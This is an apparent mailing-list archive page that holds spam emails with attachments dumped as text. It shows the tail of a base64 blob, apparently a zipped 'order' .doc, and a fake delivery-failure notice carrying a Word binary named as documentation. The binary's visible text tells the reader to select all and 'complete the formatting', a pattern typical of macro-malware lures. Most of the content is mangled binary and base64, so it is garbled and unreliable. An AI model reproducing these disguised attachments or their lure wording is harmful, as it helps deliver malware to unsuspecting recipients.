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

[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2014-10-01  5:41 postmaster-fYpdDop0OZA0n/F98K4Iww
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-fYpdDop0OZA0n/F98K4Iww @ 2014-10-01  5:41 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 171 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       buttiate-fYpdDop0OZA0n/F98K4Iww@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 226 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 50683 bytes --]

[-- Attachment #1.3.1.1: Type: text/plain, Size: 255 bytes --]

The submission for reference 924/491536 was successfully received and was not processed.

Check attached copy for more information.

This is an automatically generated email. Please do not reply as the email address is not monitored for received mail.

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1.3.1.2: Documentation300985.Doc --]
[-- Type: text/plain, Size: 36352 bytes --]

ÐÏ\x11ࡱ\x1aá\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0>\0\x03\0þÿ	\0\x06\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\03\0\0\0\0\0\0\0\0\x10\0\06\0\0\0\x01\0\0\0þÿÿÿ\0\0\0\02\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿì¥Á\0\x03€\x19\x04\0\0ð\x12¿\0\0\0\0\0\0\x10\0\0\0\0\0\b\0\0r	\0\0\x0e\0bjbj<Þ<Þ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x19\x04\x16\04\x10\0\0^´\x01\0^´\x01\0n\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0ÿÿ\x0f\0\0\0\0\0\0\0\0\0ÿÿ\x0f\0\0\0\0\0\0\0\0\0ÿÿ\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0·\0\0\0\0\0"\x06\0\0\0\0\0\0"\x06\0\0„\x13\0\0\0\0\0\0„\x13\0\0\0\0\0\0ø\x13\0\0\0\0\0\0ø\x13\0\0\0\0\0\0ø\x13\0\0\x14\0\0\0\0\0\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0\f\x14\0\0\0\0\0\0\f\x14\0\0\0\0\0\0\f\x14\0\0\0\0\0\0\f\x14\0\0\f\0\0\0\x18\x14\0\0\x14\0\0\0\f\x14\0\0\0\0\0\0Ú\x1c\0\00\x01\0\0,\x14\0\0\0\0\0\0,\x14\0\0\0\0\0\0,\x14\0\0\0\0\0\0,\x14\0\0\0\0\0\0,\x14\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0ê\x19\0\0q\x02\0\0[\x1c\0\0\0\0\0\0[\x1c\0\0\0\0\0\0[\x1c\0\0\0\0\0\0[\x1c\0\0\0\0\0\0[\x1c\0\0\0\0\0\0[\x1c\0\0$\0\0\0
\x1e\0\0¢\x02\0\0¬ \0\0D\0\0\0\x7f\x1c\0\0\x15\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ø\x13\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\a\x15\0\0\x04\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\x7f\x1c\0\0\0\0\0\0\0\0\0\0\0\0\0\0„\x13\0\0\0\0\0\0„\x13\0\0\0\0\0\0,\x14\0\0\0\0\0\0\0\0\0\0\0\0\0\0,\x14\0\0Û\0\0\0”\x1c\0\0\x16\0\0\0\x7f\x15\0\0\0\0\0\0\x7f\x15\0\0\0\0\0\0\x7f\x15\0\0\0\0\0\0\v\x15\0\0:\0\0\0„\x13\0\0R\0\0\0,\x14\0\0\0\0\0\0ø\x13\0\0\0\0\0\0,\x14\0\0\0\0\0\0ê\x19\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f\x15\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\v\x15\0\0\0\0\0\0ê\x19\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f\x15\0\0\0\0\0\0\x7f\x15\0\0\x1e\0\0\0b\x17\0\0\x18\0\0\0Ö\x13\0\0"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0®\x17\0\0\0\0\0\0,\x14\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0\x10ª;JÛÏ\x01\0\0\0\0\0\0\0\0\f\x14\0\0\0\0\0\0E\x15\0\0\0\0\0\0z\x17\0\0\b\0\0\0\0\0\0\0\0\0\0\0Ö\x19\0\0\x14\0\0\0ª\x1c\0\00\0\0\0Ú\x1c\0\0\0\0\0\0‚\x17\0\0,\0\0\0ð \0\0\0\0\0\0E\x15\0\0:\0\0\0ð \0\0\x10\0\0\0®\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ð \0\0\0\0\0\0\0\0\0\0\0\0\0\0ø\x13\0\0\0\0\0\0®\x17\0\0(\x02\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\x7f\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\x7f\x1c\0\0\0\0\0\0\x7f\x1c\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f\x15\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0Ú\x1c\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿ\0\0\0\0ð \0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0\v\x15\0\0\0\0\0\0"\x06\0\0(\f\0\0J\x12\0\0:\x01\0\0\x05\0\x12\x01\0\0\x19\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\r\r\rOn the Edit menu, click Select ALL (or press Ctrl+A), and then the complete the formatting of this document.\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\rsbyg6ESL7PaaSud35mwEtruo4I2Tpcr2QZjY4WQaNjcNH9QLL5vRlRYLF7b2jnng9rUhwa3tjJEQgGVgWgPcD3MHZKCHPVGV6FVGgNLIqRyYnskWtmOKU5umBEPgeavn40Km31628qiIBkxSNrP80wFHm4fVK1KOJc4lchJmyyFbk09ha2Z4Iwy6VVwNp1JSTFarfK84mD3R6P\r\r\r\r\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\b\0\0\x01\b\0\0\x03\b\0\0p\b\0\0Ÿ\b\0\0_	\0\0h	\0\0m	\0\0n	\0\0o	\0\0p	\0\0q	\0\0r	\0\0øðàðÑŹѵ±­Ñ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x06\x16hÓ"\0\0\x06\x16h#¢\0\0\x06\x16hñ\x03\x1c\0\0\x17\x16h‘Kó\0B*\bmH	\x04phÿÿÿ\0sH	\x04\x17\x16hë|á\0B*\bmH	\x04phÿÿÿ\0sH	\x04\x1d\x15hØ\x14V\0\x16hØ\x14V\0B*\bmH	\x04phÿÿÿ\0sH	\x04\x1f\x15hØ\x14V\0\x16hØ\x14V\05\bCJ \0aJ \0mH	\x04sH	\x04\x0e\x16hØ\x14V\0mH	\x04sH	\x04\0\x0e\x16hÒBª\0mH	\x04sH	